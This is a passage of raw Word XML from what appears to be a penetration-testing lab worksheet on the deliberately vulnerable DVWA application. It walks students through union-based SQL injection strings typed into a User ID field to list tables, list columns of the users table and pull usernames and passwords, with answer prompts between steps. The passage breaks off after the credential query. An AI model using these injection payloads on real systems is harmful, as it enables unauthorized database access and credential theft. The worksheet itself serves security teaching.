    <w:p w14:paraId="5F6FA79E" w14:textId="0FF79A45" w:rsidR="0079570D" w:rsidRDefault="005710DB" w:rsidP="0079570D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Retrieve </w:t>
      </w:r>
      <w:r w:rsidR="0037490E">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">able </w:t>
      </w:r>
      <w:r w:rsidR="00996C9B">
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ames from the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0037490E">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>atabase</w:t>
      </w:r>
      <w:r w:rsidR="00A24747">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6AC5AC" w14:textId="77777777" w:rsidR="005674D4" w:rsidRDefault="0079570D" w:rsidP="005674D4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field </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidR="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382EFB8D" w14:textId="5F288819" w:rsidR="005674D4" w:rsidRPr="005674D4" w:rsidRDefault="0079570D" w:rsidP="005674D4">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0082381E" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OR</w:t>
      </w:r>
      <w:r w:rsidR="003941C8" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1=1</w:t>
      </w:r>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UNION SELECT </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Int_2NEiF3mD"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">_name FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_type</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0082381E" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>base table</w:t>
      </w:r>
      <w:r w:rsidR="0082381E" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="0082381E" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005674D4" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0082381E" w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="5CA474AF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDAD103" w14:textId="53FD09AF" w:rsidR="0079570D" w:rsidRPr="005674D4" w:rsidRDefault="005674D4" w:rsidP="005674D4">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="0079570D" w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>lick</w:t>
      </w:r>
      <w:r w:rsidR="0079570D" w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidR="0079570D" w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F9E8D4" w14:textId="58FFB59F" w:rsidR="0079570D" w:rsidRDefault="00506741" w:rsidP="005C2C60">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The output with </w:t>
      </w:r>
      <w:r w:rsidR="005C2C60" w:rsidRPr="00E621CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>First Name: 1</w:t>
      </w:r>
      <w:r w:rsidR="005C2C60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00131683">
        <w:t>is the table information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3D29E2" w14:textId="70E8FB2C" w:rsidR="00E621CE" w:rsidRDefault="00E621CE" w:rsidP="00E621CE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E857C9" w14:textId="27D06457" w:rsidR="00131683" w:rsidRPr="00750A25" w:rsidRDefault="00131683" w:rsidP="00E621CE">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>What are the two tables that were found?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712EED09" w14:textId="0846539B" w:rsidR="00131683" w:rsidRDefault="00E621CE" w:rsidP="00E621CE">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r>
        <w:t>Type your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666338B" w14:textId="5C92155B" w:rsidR="00701468" w:rsidRPr="00750A25" w:rsidRDefault="00C51DFC" w:rsidP="005710DB">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Which table do you think is the most interesting for a penetration test?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2365C630" w14:textId="6E07AFE5" w:rsidR="0079570D" w:rsidRPr="00750A25" w:rsidRDefault="00D423FE" w:rsidP="00750A25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Type your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E234BCF" w14:textId="28EE343F" w:rsidR="00804D33" w:rsidRDefault="00804D33" w:rsidP="00804D33">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Retrieve </w:t>
      </w:r>
      <w:r w:rsidR="00DB2A05">
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">olumn </w:t>
      </w:r>
      <w:r w:rsidR="00DB2A05">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ames from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB2A05">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>able</w:t>
      </w:r>
      <w:r w:rsidR="006020E6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BF405B" w14:textId="6B0A7829" w:rsidR="00701468" w:rsidRPr="00701468" w:rsidRDefault="00701468" w:rsidP="00D0747D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You will now </w:t>
      </w:r>
      <w:r w:rsidR="00DD547E">
        <w:t xml:space="preserve">discover the field names in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD547E">
        <w:t>users</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD547E">
        <w:t xml:space="preserve"> table. This will help you to find information that is useful for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD547E">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD547E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D485C20" w14:textId="77777777" w:rsidR="00804D33" w:rsidRDefault="00804D33" w:rsidP="00804D33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field </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C032757" w14:textId="16B084DC" w:rsidR="00804D33" w:rsidRPr="005674D4" w:rsidRDefault="00804D33" w:rsidP="00804D33">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004A0E91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OR 1=1 UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,</w:t>
      </w:r>
      <w:r w:rsidR="004156D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">_name FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.</w:t>
      </w:r>
      <w:r w:rsidR="004156D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_</w:t>
      </w:r>
      <w:r w:rsidR="004156D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="004A0E91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="004156D6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="004A0E91">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00092E38" w14:textId="77777777" w:rsidR="00804D33" w:rsidRPr="005674D4" w:rsidRDefault="00804D33" w:rsidP="00804D33">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>lick</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C2E65" w14:textId="77777777" w:rsidR="005F515F" w:rsidRDefault="005F515F" w:rsidP="005F515F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Question:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EC640" w14:textId="420CB86E" w:rsidR="00804D33" w:rsidRPr="00750A25" w:rsidRDefault="004A71D8" w:rsidP="005F515F">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>The list of column names displays a</w:t>
      </w:r>
      <w:r w:rsidR="00223205" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>fter the listing of user accounts</w:t>
      </w:r>
      <w:r w:rsidR="0020057C" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A3223" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="0020057C" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="009E2F9A" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>output</w:t>
      </w:r>
      <w:r w:rsidR="009558EB" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000E1B69" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> The information in which two columns </w:t>
      </w:r>
      <w:r w:rsidR="005A183C" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>is of interest to use in our penetration test?</w:t>
      </w:r>
      <w:r w:rsidR="004363F1" w:rsidRPr="00750A25">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627322A1" w14:textId="77777777" w:rsidR="00355A5A" w:rsidRDefault="00355A5A" w:rsidP="00355A5A">
      <w:pPr>
        <w:pStyle w:val="AnswerLineL50"/>
      </w:pPr>
      <w:r>
        <w:t>Type your answers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE91FF" w14:textId="044ED392" w:rsidR="00824974" w:rsidRDefault="00824974" w:rsidP="004A00F9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Retrieve </w:t>
      </w:r>
      <w:r w:rsidR="00C51114">
        <w:t>the user credentials</w:t>
      </w:r>
      <w:r w:rsidR="006020E6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AA0A49" w14:textId="41F354FE" w:rsidR="00C51114" w:rsidRPr="00C51114" w:rsidRDefault="00C51114" w:rsidP="00C43F6D">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>This query will retrieve the users and passwords</w:t>
      </w:r>
      <w:r w:rsidR="005B69B0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC3DEBF" w14:textId="25094BB4" w:rsidR="00824974" w:rsidRDefault="00824974" w:rsidP="00824974">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="006C5907">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User ID:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> field </w:t>
      </w:r>
      <w:r w:rsidRPr="0048523A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444509A5" w14:textId="5ECBF50D" w:rsidR="00824974" w:rsidRPr="005674D4" w:rsidRDefault="00824974" w:rsidP="00824974">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00D163BF">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OR 1=1 UNION SELECT </w:t>
      </w:r>
      <w:r w:rsidR="009E2F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">user, password </w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r w:rsidR="009E2F9A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FEAFD" w14:textId="77777777" w:rsidR="00824974" w:rsidRPr="005674D4" w:rsidRDefault="00824974" w:rsidP="00824974">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>lick</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Submit</w:t>
      </w:r>
      <w:r w:rsidRPr="005674D4">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736C2E7" w14:textId="64FF4AD1" w:rsidR="00824974" w:rsidRDefault="00A42FDB" w:rsidP="00824974">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
